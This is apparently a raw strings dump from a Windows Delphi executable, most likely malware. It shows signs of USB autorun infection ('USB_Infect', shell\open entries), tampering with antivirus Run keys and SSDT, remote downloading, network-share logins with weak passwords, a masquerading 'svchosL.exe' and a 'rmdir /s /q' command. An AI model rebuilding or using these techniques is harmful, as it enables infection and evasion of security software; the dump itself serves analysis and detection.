PeepNet
pii\hu
*/`p{l
PostMessageA
@p:pp@ly
P.reloc
Process32First
Process32FirstW
Process32Next
Process32NextW
P.rsrc
qComConst
qcWpS	
q&e$#(
?QGmI	b
qnz&&X
QO6kRy
QQQQQQQQSV
QQQQQQQQSV3
QQQQQQQQSVW3
QQQQQQSVW3
QQQQQSVW
QQQQSV
qQSuj2Y\
QTypInfo
QUE>%"
QueryPerformanceCounter
QueryServiceConfig2A
QueryServiceConfig2W
qwerty
Q}\YYg:
R8Lb;{
RaiseException
[Rb!{7f
.rdata
ReadFile
Read File Info Error!
RealizePalette
Real Ssdt %.8X
Recycled
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
.reloc
ResetEvent
resizable
RESSDT
\\\\.\\RESSDTDOS
rmdir /s /q 
RsCCenter
RsRavMon
RtlAnsiStringToUnicodeString
"RTLConsts
RtlFreeUnicodeString
RtlInitAnsiString
RtlUnwind
Runtime error     at 00000000
RUSSIAN_CHARSET
S8%OkN
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
safeboxTray.exe
Schedule
SdZ]_^[
SelectObject
SelectPalette
SendMessageA
server
SetBkColor
SetBkMode
SetEndOfFile
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetROP2
SetTextColor
SetTimer
shadow
sharedaccess
shell32.dll
SHELL32.DLL
*ShellAPI
shell\explore=
shell\explore\Command=
shell\open=
shell\open\Command=
shell\open\Default=1
SHFileOperationA
SHIFTJIS_CHARSET
ShortInt
Single
SizeofResource
s`)L$4
Smallint
SmartSniff
sNbUdD
SNDSrvc
Sniffer
?&SNN~
socket
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SPBBCSvc
spynet
StartServiceA
StatusBar
strcat
strcpy
StretchBlt
_stricmp
String
Strings
svchosL.exe
:	SWem
S$_^[Y]
sybase
Symantec Core LC
SYMBOL_CHARSET
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
system32
\SystemRoot\System32\
System Volume Information
SysUtils
<*t"<0r=<9w9i
t9PVWh
tagEXCEPINFO 
tC*B7qe
TColor
TCustomMemoryStream
TCustomVariantType
TCustomVariantType,
-tcW2M
temp123
TerminateProcess
	TErrorRec
test123
TExceptRec
	TFileName
TFileStream
TFontCharset
TGraphic
TGraphic(
THAI_CHARSET
THandleStream
!This program cannot be run in DOS mode.
This program must be run under Win32
Thread32First
Thread32Next
t%HtIHtm
TIconImage
TIdentMapEntry
	TIntConst
TInterfacedObject
TInterfacedPersistent
TInterfacedPersistent4QA
TJZHvn
TlHelp32
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TNetBIOS
TObjecth
TObjectt
toolbar
Toolhelp32ReadProcessMemory
TPatternManagerSV
T%P DA
TPersistent
 Tpt]p
	TRegGroup
TRegGroups
TResourceManager
TSearchRecX
TSharedImage
TStream
TStringItem
TStringList
TStrings
TThreadList
TThreadLocalCounter
t$t#t$l
TURKISH_CHARSET
TXPlatform.exe
t+;YX; 
%.U{*{
U,.-.._
U	0GPhF
Uc4VVB<
u#GFg1
ujj[?h
UnhandledExceptionFilter
Unknown
UnrealizeObject
Update
URLDownloadToFileA
URLMON.DLL
uS6mg*
USB_Infect
user32.dll
USER32.DLL
UTypes
uv'~),
u,)- vC
uvy%><
uY +de
v-]21v
V3[3i3
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
VarUnit
$VarUtils
VarXor
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Visible
VjJaI]Kg
vO1R0fBT
VP%AM1
Vw`N3 
WaitForSingleObject
Wgf68J
WideCharToMultiByte
WideStringh
WINDOWS
Windows Media Player
Windows NT
\WINDOWS\Start Menu\Programs\Startup\
WindowsUpdate
WinExec
?WinInet
wininet.dll
WININET.DLL
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
WinRAR
WinSock
Winsock Expert
WinSvc
WinSvcEx
wkb9:/
WNetAddConnection2A
WNetCancelConnectionA
WriteFile
WSACleanup
WSAStartup
wscsvc
wsock32.dll
WSOCK32.DLL
Wt_Time
>WZ|s<
>x4]qJcoX
)}<Xk:N
x:PCq}n?
XPTPSW
'$XPwW
Xq#iLn
x\vk{$Q.?
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Y4SJ(E
y,~?MtE
_^[YY]
y*yW^F
$YZ_^[
$YZ]_^[
YZ]_^[
$Z]_^[
Z F~WZ
@Z_@H1
ZOnkMeK
ZTUWVSPRTj
ZwClose
ZwCreateFile
ZwDuplicateObject
ZwQueryInformationFile
ZwQuerySystemInformation
ZwQuerySystemInformation failed! ulNeededSize = %ul
ZwReadFile
zxcvxcxzcxzzzzzzzzzzzzzzzzzzzzzzzzzz